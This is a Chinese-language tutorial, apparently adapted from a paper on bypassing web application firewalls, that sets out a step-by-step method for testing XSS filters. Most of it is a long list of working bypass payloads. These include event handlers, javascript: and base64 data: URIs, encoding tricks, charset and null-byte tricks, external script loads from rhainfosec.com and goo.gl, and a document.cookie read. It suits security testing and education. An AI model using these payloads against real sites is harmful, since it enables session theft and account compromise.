本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征肯定是哪一个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽然说是绕WAF的,但这里仍是根据WAF中的正则缺陷来绕过测试方法,并非协议上问题,因此呢,基本能够通用于其余xss过滤的场景。方便新手们比较快速的了解到测试xss的一些基本的方法。javascript
大多数的场所是用的黑名单来作过滤器的,有三种方式绕过黑名单的测试:php
一、暴力测试(输入大量的payload,看返回结果) 二、根据正则推算 三、利用浏览器bug
1)尝试插入比较正常的HTML标签,例如:<b>,<i>,<u>
来看一下返回页面的状况是怎样的,是否被HTML编码了,或者标签被过滤了。html
2)尝试插入不闭合的标签,例如:<b,<i,<u,<marquee
而后看一下返回响应,是否对开放的标签也有过滤。java
3)而后测试几个XSS的payload,基本全部的xss过滤器都会进行过滤的:express
<script>alert(1);</script> <script>prompt(1);</script> <script>confirm(1);</script> <scriptsrc="http://rhainfosec.com/evil.js">
看返回响应,是过滤的所有,仍是只过滤了部分,是否还留下了alert,prompt,confirm
字符,再尝试大小写的组合:浏览器
<scRiPt>alert(1);</scrIPt>
4)若是过滤器仅仅是把<script>
和</script>
标签过滤掉,那么能够用cookie
<scr<script>ipt>alert(1)</scr<script>ipt>
的方式来绕过,这样当<script>
标签被过滤掉,剩下的组合起来恰好造成一个完整的payload。app
5)用<a href
标签来测试,看返回响应框架
<a href="http://www.google.com">Clickme</a>
<a
标签是否被过滤 href是否被过滤 href里的数据是否被过滤xss
若是没有数据被过滤,插入javascript协议看看:
<a href="javascript:alert(1)">Clickme</a>
是否返回错误 javascript的整个协议内容是否都被过滤掉,仍是只过滤了javascript字符 尝试下大小写转换
继续测试事件触发执行javascript:
<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>
看onmouseover事件是否被过滤。测试一个无效的事件,看过滤规则:
<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
是完整的返回了呢,仍是跟onmouseover同样被干掉了。
若是是完整的返回的话呢,那么意味着,作了事件的黑名单,可是在HTML5中,有超过150种的方式来执行javascript代码的事件测试一个不多见的事件:
<body/onhashchange=alert(1)><a href=#>clickit
接下来测试其余的标签跟属性
<img src=x onerror=prompt(1);> <img/src=aaa.jpg onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);>
<iframe src="javascript:alert(2)"> <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<embed/src=//goo.gl/nlX0P>
利用<form,<isindex
等标签中的action属性执行javascript
<form action="Javascript:alert(1)"><input type=submit> <isindex action="javascript:alert(1)" type=image> <isindex action=j	a	vas	c	r	ipt:alert(1) type=image> <isindex action=data:text/html, type=image> <formaction="data:text/html,<script>alert(1)</script>"><button>CLICK
<isindexformaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript:alert(1)>CLICKME
<table background=javascript:alert(1)></table> // 在Opera 10.5和IE6上有效
<video poster=javascript:alert(1)//></video> // Opera 10.5如下有效
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object/data=//goo.gl/nlX0P?
<applet code="javascript:confirm(document.cookie);"> // Firefox有效 <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg/onload=prompt(1);> <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)">
<q/oncut=open()> <q/oncut=alert(1)>//在限制长度的地方颇有效
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <bodylanguage=vbsonload=alert-1//IE8有效 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x6 6\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> //IE8有效
当括号被过滤的时候可使用throw来绕过
<a onmouseover="javascript:window.onerror=alert;throw 1> <img src=x onerror="javascript:window.onerror=alert;throw 1">
以上两个测试向量在Chrome跟IE在上面会出现一个“uncaught”的错误,能够用如下的向量:
<body/onload=javascript:window.onerror=eval;throw"=alert\x281\x29";>
<img style="xss:expression(alert(0))"> // IE7如下 <div style="color:rgb(""�x:expression(alert(1))"></div> // IE7如下 <style>#test{x:expression(alert(/XSS/))}</style> // IE7如下
<a onmouseover=location="javascript:alert(1)">click <body onfocus="loaction="javascript:alert(1)"">123
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg> <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> <meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/> <math><a xlink:href="//jsfiddle.net/t846h/">click
<svg><script>alert(/1/)</script> // 通杀全部浏览器
opera中能够不闭合
<svg><script>alert( 1) // Opera可查
不少状况下WAF会实体编码用户的输入数据,
javascript是一个很灵活的语言,可使用不少编码,好比十六进制,Unicode和HTML。可是也对这些编码能够用在哪一个位置有规定:
属性:
href= action= formaction= location= on*= name= background= poster= src= code=
支持的编码方式:HTML,八进制,十进制,十六进制和Unicode
属性:
data=
支持的编码:base64
WAF最大的问题,在于不知道输出的位置的上下文,致使根据具体环境能够绕过。
<input value="XSStest" type=text>
可控位置为XSStest,可使用
"><img src=x onerror=prompt(0);>
若是< >
被过滤的话能够换成
" autofocus onfocus=alert(1)//
一样还有不少其余的payload:
"onmouseover=" prompt(0)x=" "onfocusin=alert(1) autofocusx=" " onfocusout=alert(1) autofocus x=" "onblur=alert(1) autofocusa="
例如:
<script> Var x="Input"; </script>
可控位置在Input,能够闭合script标签插入代码,可是一样咱们仅仅闭合双引号就能够执行js代码了
";alert(1)//
最终结果就是
<script> Var x="";alert(1)// </script>
例如:
";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))//
下面是一些相同的类:
DOMAttrModified DOMCharacterDataModified DOMFocusIn DOMFocusOut DOMMouseScroll DOMNodeInserted DOMNodeInsertedIntoDocument DOMNodeRemoved DOMNodeRemovedFromDocument DOMSubtreeModified
例如:
<a href="Userinput">Click</a>
可控的是Userinput那里咱们须要作的只是把javascript代码输入就行了:
javascript:alert(1)//
最后组合为:
<a href="javascript:alert(1)//">Click</a>
使用HTML实体URL编码绕过黑名单,href里会自动实体解码,若是都失败了,能够尝试使用vbscript在IE10如下都有效,或者使用data协议。
使用javascript协议时可以使用的例子:
javascript:alert(1) javaSCRIPT:alert(1) JaVaScRipT:alert(1) javas	cript:\u0061lert(1); javascript:\u0061lert(1) javascript:alert(document.cookie)
vbscript:alert(1); vbscript:alert(1); vbscr	ipt:alert(1)" Data URl data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
当你的输入会在encodeURIComponent当中显示出来的时候,很容易插入xss代码了
encodeURIComponent("userinput")
userinput处可控,测试代码:
-alert(1)- -prompt(1)- -confirm(1)-
最终结果:
encodeURIComponent("-alert(1)-") encodeURIComponent("-prompt(1)-")
当返回结果在svg标签中的时候,会有一个特性
<svg><script>varmyvar="YourInput";</script></svg>
YourInput可控,输入
www.site.com/test.php?var=text";alert(1)//
若是把"编码一些他仍然可以执行:
<svg><script>varmyvar="text";alert(1)//";</script></svg>
字符集的bug在IE中出现过不少次,第一个就是UTF-7,可是这个只在以前的版本中可用,如今讨论一个在如今的浏览器当中能够执行的javascript。
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
这个页面当中咱们可控当前页面的字符集,当咱们常规的测试时:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src=x onerror=prompt(0);>
返回结果能够看到双引号被编码了:
<html> <meta charset="utf-8"></meta> <body> <input type="text" value=""><img src=x onerror=prompt(0);>"></input> </body> </html>
设置字符集为UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
上面这个在IE9及如下版本能够执行成功。
利用0字节绕过:
<scri%00pt>alert(1);</scri%00pt> <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
在IE9及如下版本有效。
其余等等一系列浏览器特性的XSS能够参考如下文章:
http://drops.wooyun.org/tips/147
本文主要是一个测试XSS的思路流程,并无把全部的payload写全,其实也没有人可以写全,只是列了一个大致的框架,你们实际在寻找的过程当中能够不断慢慢的根据这种思路补充本身的payload,想必呢,必定会有很大的进步的!~